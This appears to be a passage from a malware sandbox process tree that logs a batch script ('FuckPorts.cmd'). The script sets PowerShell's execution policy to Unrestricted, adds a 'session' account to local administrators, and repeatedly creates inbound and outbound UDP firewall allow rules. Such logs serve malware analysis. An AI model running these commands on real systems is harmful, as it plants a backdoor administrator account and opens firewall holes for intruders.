C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:784
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:780
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1968
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2136
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2264
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2460
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2596
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2760
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2876
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2940
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2212
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2420
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2392
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2724
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2848
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2812
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2280
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2620
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2748
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2228
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2940
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1752
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2044
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2356
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2580
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1444
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3024
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2848
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1772
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2188
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2664
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3016
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3008
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2644
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2340
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2660
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2904
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2192
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:844
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:396
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2224
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2264
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2272
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2664
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2988
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3040
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3012
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2180
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2072
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2428
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2340
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3052
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2816
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3008
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2152
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2344
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2224
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2480
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2628
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2052
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2192
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2124
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2288
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:296
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2344
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2744
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:1352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2788
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2664
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2988
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2084
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2812
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2240
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2576
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2716
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2464
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2940
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2192
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2204
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2508
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2344
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2312
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2072
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2512
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2920
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3028
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2656
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2456
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2744
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2264
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2728
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2864
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2876
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2432
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2308
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2496
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2836
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:560
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2860
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2920
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2116
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:936
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵PID:1332
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:1520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:956
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:1628
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1880
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2148
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2256
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2392
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2540
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2668
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2808
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2948
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:844
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:296
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2304
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2380
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2492
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2636
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2868
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3036
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:948
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2252
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2400
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2820
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2924
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3032
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2372
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2264
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2376
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2492
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2648
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2688
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2164
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2304
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2464
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2728
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3004
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2672
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2292
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2264
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2488
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2800
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2852
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2948
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2072
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2104
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2536
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2788
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2920
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:308
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2848
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2132
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2436
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2668
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2596
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3032
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:844
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:1588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2356
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:1352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2536
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:1924
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2668
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2780
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:660
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2104
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2420
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2072
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2856
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2780
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2596
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:844
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:3056
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2252
-
-
